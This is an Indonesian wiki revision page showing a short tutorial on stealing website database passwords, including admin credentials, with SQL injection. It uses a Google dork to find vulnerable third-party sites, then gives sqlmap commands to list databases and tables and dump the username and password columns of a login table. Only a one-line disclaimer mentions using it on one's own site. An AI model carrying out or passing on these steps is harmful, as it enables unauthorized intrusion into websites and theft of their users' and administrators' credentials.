Difference between revisions of "Sqlmap: memperoleh password database sql"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 20: | Line 20: | ||
==Step 2 – Kali SQLMAP – dapatkan website database== | ==Step 2 – Kali SQLMAP – dapatkan website database== | ||
| − | sqlmap –u http:\\website.com/page.php?id=1 | + | sqlmap –u http:\\website.com/page.php?id=1 --dbs |
Ambil semua database yang tersedia di web. | Ambil semua database yang tersedia di web. | ||
| Line 26: | Line 26: | ||
==Step 3 – Cari tabel LOGIN== | ==Step 3 – Cari tabel LOGIN== | ||
| − | sqlmap –u http:\\website.com/page.php?id=1 | + | sqlmap –u http:\\website.com/page.php?id=1 -D www --tables |
Cari target seperti, tabel login, username atau password. | Cari target seperti, tabel login, username atau password. | ||
| Line 32: | Line 32: | ||
==Step 4 – Dapatkan semua login data== | ==Step 4 – Dapatkan semua login data== | ||
| − | sqlmap –u http:\\website.com/page.php?id=1 | + | sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns |
Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username. | Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username. | ||
| Line 38: | Line 38: | ||
==Step 5 – Dapatkan Username (& Admin)== | ==Step 5 – Dapatkan Username (& Admin)== | ||
| − | sqlmap –u http:\\website.com/page.php?id=1 | + | sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump |
Cari “admin” | Cari “admin” | ||
| Line 45: | Line 45: | ||
==Step 6 – Dapatkan Password (dari Admin)== | ==Step 6 – Dapatkan Password (dari Admin)== | ||
| − | sqlmap –u http:\\website.com/page.php?id=1 | + | sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump |
That’s it. | That’s it. | ||
Latest revision as of 07:34, 14 November 2014
Berikut adalah cara memperoleh password, termasuk password admin sebuah situs web. Lakukan ini ke web anda sendiri, agar tidak melanggar hukum.
Step 1 – Google search php?=id1
Cari di Google, keyword
php?=id1
Jika sudah dapat URL-nya dari Google, Tambahkan sebuah quote di akhir URL-nya sehingga menjadi
http://alamatweb.com/index.php?=id1′
Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.
Step 2 – Kali SQLMAP – dapatkan website database
sqlmap –u http:\\website.com/page.php?id=1 --dbs
Ambil semua database yang tersedia di web.
Step 3 – Cari tabel LOGIN
sqlmap –u http:\\website.com/page.php?id=1 -D www --tables
Cari target seperti, tabel login, username atau password.
Step 4 – Dapatkan semua login data
sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns
Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.
Step 5 – Dapatkan Username (& Admin)
sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump
Cari “admin”
Step 6 – Dapatkan Password (dari Admin)
sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump
That’s it.